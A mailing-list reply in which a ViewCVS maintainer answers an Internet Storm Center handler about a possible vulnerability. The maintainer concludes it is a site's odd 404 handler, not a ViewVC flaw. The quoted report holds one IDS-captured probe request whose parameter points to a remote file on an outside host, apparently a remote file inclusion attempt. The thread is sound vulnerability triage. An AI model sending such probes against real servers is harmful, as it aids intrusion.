Re: [viewvc-dev] Possible vulnerability in ViewCVS

"C. Michael Pilato" <[email protected]>
Newsgroups gmane.comp.version-control.cvs.viewcvs.devel
Organization CollabNet, Inc.
Message-ID <479FF184.1080006__16303.8653358401$1201666347$gmane$org@collab.net>
toby wrote:
> Hello,
> I'm one of the handlers at the Internet Storm Center. We just got a note 
> from one
> of our contributors about seeing new strings showing up in their IDS 
> that suggest
> a possible vulnerability in ViewCVS:
> 
> GET 
> //viewcvs.cgi/snort/etc/sid-msg.map?rev=http://nocsom.org/images/IDsafeon.txt???
> 
> The contributor has validated that it worked against some live sites 
> online but was unable to tell us which version was vulnerable.
> Is this an attack you are already aware of? If so, which version is no 
> longer vulnerable? We'd like to warn our readers that this is showing up 
> but wanted to give you a heads-up and a chance to fix it if you weren't 
> already aware.
> 
> We look forward to your response.
> Thanks,
> toby
> (handler on deck)

I've corresponded privately with Toby about this matter over the past few 
days, and his informant (who wishes to remain anonymous) pointed me (through 
Toby) to a particular website he claimed was suffering from a ViewVC 
vulnerability.  I've reviewed the information and have the utmost confidence 
that he is mistaken, seeing not a vulnerability in ViewVC but install a 
bizarre 404 handler on the site in question.

I can provide additional details for third-party investigation if anyone is 
interested.

-- 
C. Michael Pilato <[email protected]>
CollabNet   <>   www.collab.net   <>   Distributed Development On Demand

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.